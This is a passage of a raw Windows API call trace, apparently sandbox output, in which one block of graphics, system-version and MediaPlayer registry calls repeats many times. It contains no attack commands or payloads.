[0017.591] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5604027d [0017.591] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ad8 [0017.591] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ad9 [0017.591] CombineRgn (hrgnDst=0x1040ad8, hrgnSrc1=0x60040713, hrgnSrc2=0x5604027d, iMode=1) returned 1 [0017.591] CombineRgn (hrgnDst=0x1040ad9, hrgnSrc1=0x60040713, hrgnSrc2=0x5604027d, iMode=4) returned 2 [0017.591] CreateSolidBrush (color=0xff) returned 0x2100ad7 [0017.591] CreateSolidBrush (color=0xff0000) returned 0x1100ada [0017.591] DeleteObject (ho=0x1100ada) returned 1 [0017.591] DeleteObject (ho=0x5604027d) returned 1 [0017.591] DeleteObject (ho=0x60040713) returned 1 [0017.591] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.591] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.592] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.592] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.592] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.592] BeginPath (hdc=0x0) returned 0 [0017.592] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.592] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.592] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.592] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.592] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.592] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.592] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.592] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.592] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5704027d [0017.592] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x61040713 [0017.592] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040adb [0017.592] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040adc [0017.592] CombineRgn (hrgnDst=0x1040adb, hrgnSrc1=0x5704027d, hrgnSrc2=0x61040713, iMode=1) returned 1 [0017.592] CombineRgn (hrgnDst=0x1040adc, hrgnSrc1=0x5704027d, hrgnSrc2=0x61040713, iMode=4) returned 2 [0017.592] CreateSolidBrush (color=0xff) returned 0x2100ada [0017.592] CreateSolidBrush (color=0xff0000) returned 0x1100add [0017.592] DeleteObject (ho=0x1100add) returned 1 [0017.592] DeleteObject (ho=0x61040713) returned 1 [0017.592] DeleteObject (ho=0x5704027d) returned 1 [0017.592] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.592] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.592] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.592] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.592] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.593] BeginPath (hdc=0x0) returned 0 [0017.593] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.593] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.593] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.593] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.593] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.593] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.593] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.593] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.593] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x62040713 [0017.593] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5804027d [0017.593] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ade [0017.593] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040adf [0017.593] CombineRgn (hrgnDst=0x1040ade, hrgnSrc1=0x62040713, hrgnSrc2=0x5804027d, iMode=1) returned 1 [0017.593] CombineRgn (hrgnDst=0x1040adf, hrgnSrc1=0x62040713, hrgnSrc2=0x5804027d, iMode=4) returned 2 [0017.593] CreateSolidBrush (color=0xff) returned 0x2100add [0017.593] CreateSolidBrush (color=0xff0000) returned 0x1100ae0 [0017.593] DeleteObject (ho=0x1100ae0) returned 1 [0017.593] DeleteObject (ho=0x5804027d) returned 1 [0017.593] DeleteObject (ho=0x62040713) returned 1 [0017.593] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.593] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.593] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.593] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.593] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.593] BeginPath (hdc=0x0) returned 0 [0017.593] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.593] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.593] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.593] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.593] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.593] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.594] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.594] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.594] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5904027d [0017.594] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x63040713 [0017.594] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ae1 [0017.594] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ae2 [0017.594] CombineRgn (hrgnDst=0x1040ae1, hrgnSrc1=0x5904027d, hrgnSrc2=0x63040713, iMode=1) returned 1 [0017.594] CombineRgn (hrgnDst=0x1040ae2, hrgnSrc1=0x5904027d, hrgnSrc2=0x63040713, iMode=4) returned 2 [0017.594] CreateSolidBrush (color=0xff) returned 0x2100ae0 [0017.594] CreateSolidBrush (color=0xff0000) returned 0x1100ae3 [0017.594] DeleteObject (ho=0x1100ae3) returned 1 [0017.594] DeleteObject (ho=0x63040713) returned 1 [0017.594] DeleteObject (ho=0x5904027d) returned 1 [0017.594] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.594] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.594] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.594] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.594] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.594] BeginPath (hdc=0x0) returned 0 [0017.594] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.594] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.594] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.594] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.594] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.594] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.594] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.595] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.595] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x64040713 [0017.595] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5a04027d [0017.595] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ae4 [0017.595] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ae5 [0017.595] CombineRgn (hrgnDst=0x1040ae4, hrgnSrc1=0x64040713, hrgnSrc2=0x5a04027d, iMode=1) returned 1 [0017.595] CombineRgn (hrgnDst=0x1040ae5, hrgnSrc1=0x64040713, hrgnSrc2=0x5a04027d, iMode=4) returned 2 [0017.595] CreateSolidBrush (color=0xff) returned 0x2100ae3 [0017.595] CreateSolidBrush (color=0xff0000) returned 0x1100ae6 [0017.595] DeleteObject (ho=0x1100ae6) returned 1 [0017.595] DeleteObject (ho=0x5a04027d) returned 1 [0017.595] DeleteObject (ho=0x64040713) returned 1 [0017.595] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.595] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.595] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.595] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.595] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.595] BeginPath (hdc=0x0) returned 0 [0017.595] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.595] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.595] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.595] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.595] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.595] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.595] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.595] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.596] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5b04027d [0017.596] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x65040713 [0017.596] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ae7 [0017.596] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ae8 [0017.596] CombineRgn (hrgnDst=0x1040ae7, hrgnSrc1=0x5b04027d, hrgnSrc2=0x65040713, iMode=1) returned 1 [0017.596] CombineRgn (hrgnDst=0x1040ae8, hrgnSrc1=0x5b04027d, hrgnSrc2=0x65040713, iMode=4) returned 2 [0017.596] CreateSolidBrush (color=0xff) returned 0x2100ae6 [0017.596] CreateSolidBrush (color=0xff0000) returned 0x1100ae9 [0017.596] DeleteObject (ho=0x1100ae9) returned 1 [0017.596] DeleteObject (ho=0x65040713) returned 1 [0017.596] DeleteObject (ho=0x5b04027d) returned 1 [0017.596] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.596] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.596] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.596] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.596] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.596] BeginPath (hdc=0x0) returned 0 [0017.596] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.596] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.596] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.596] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.596] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.596] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.596] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.596] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.596] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x66040713 [0017.596] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5c04027d [0017.596] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040aea [0017.596] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040aeb [0017.596] CombineRgn (hrgnDst=0x1040aea, hrgnSrc1=0x66040713, hrgnSrc2=0x5c04027d, iMode=1) returned 1 [0017.597] CombineRgn (hrgnDst=0x1040aeb, hrgnSrc1=0x66040713, hrgnSrc2=0x5c04027d, iMode=4) returned 2 [0017.597] CreateSolidBrush (color=0xff) returned 0x2100ae9 [0017.597] CreateSolidBrush (color=0xff0000) returned 0x1100aec [0017.597] DeleteObject (ho=0x1100aec) returned 1 [0017.597] DeleteObject (ho=0x5c04027d) returned 1 [0017.597] DeleteObject (ho=0x66040713) returned 1 [0017.597] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.597] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.597] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.597] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.597] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.597] BeginPath (hdc=0x0) returned 0 [0017.597] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.597] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.597] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.597] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.597] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.597] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.597] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.597] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.597] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5d04027d [0017.597] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x67040713 [0017.597] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040aed [0017.597] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040aee [0017.597] CombineRgn (hrgnDst=0x1040aed, hrgnSrc1=0x5d04027d, hrgnSrc2=0x67040713, iMode=1) returned 1 [0017.597] CombineRgn (hrgnDst=0x1040aee, hrgnSrc1=0x5d04027d, hrgnSrc2=0x67040713, iMode=4) returned 2 [0017.597] CreateSolidBrush (color=0xff) returned 0x2100aec [0017.597] CreateSolidBrush (color=0xff0000) returned 0x1100aef [0017.597] DeleteObject (ho=0x1100aef) returned 1 [0017.598] DeleteObject (ho=0x67040713) returned 1 [0017.598] DeleteObject (ho=0x5d04027d) returned 1 [0017.598] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.598] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.598] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.598] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.598] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.598] BeginPath (hdc=0x0) returned 0 [0017.598] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.598] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.598] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.598] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.598] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.598] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.598] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.598] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.598] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x68040713 [0017.598] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5e04027d [0017.598] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040af0 [0017.598] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040af1 [0017.598] CombineRgn (hrgnDst=0x1040af0, hrgnSrc1=0x68040713, hrgnSrc2=0x5e04027d, iMode=1) returned 1 [0017.598] CombineRgn (hrgnDst=0x1040af1, hrgnSrc1=0x68040713, hrgnSrc2=0x5e04027d, iMode=4) returned 2 [0017.598] CreateSolidBrush (color=0xff) returned 0x2100aef [0017.598] CreateSolidBrush (color=0xff0000) returned 0x1100af2 [0017.598] DeleteObject (ho=0x1100af2) returned 1 [0017.598] DeleteObject (ho=0x5e04027d) returned 1 [0017.598] DeleteObject (ho=0x68040713) returned 1 [0017.598] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.598] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.598] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.599] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.599] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.599] BeginPath (hdc=0x0) returned 0 [0017.599] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.599] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.599] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.599] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.599] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.599] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.599] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.599] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.599] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5f04027d [0017.599] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x69040713 [0017.599] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040af3 [0017.599] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040af4 [0017.599] CombineRgn (hrgnDst=0x1040af3, hrgnSrc1=0x5f04027d, hrgnSrc2=0x69040713, iMode=1) returned 1 [0017.599] CombineRgn (hrgnDst=0x1040af4, hrgnSrc1=0x5f04027d, hrgnSrc2=0x69040713, iMode=4) returned 2 [0017.599] CreateSolidBrush (color=0xff) returned 0x2100af2 [0017.599] CreateSolidBrush (color=0xff0000) returned 0x1100af5 [0017.599] DeleteObject (ho=0x1100af5) returned 1 [0017.599] DeleteObject (ho=0x69040713) returned 1 [0017.599] DeleteObject (ho=0x5f04027d) returned 1 [0017.599] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, 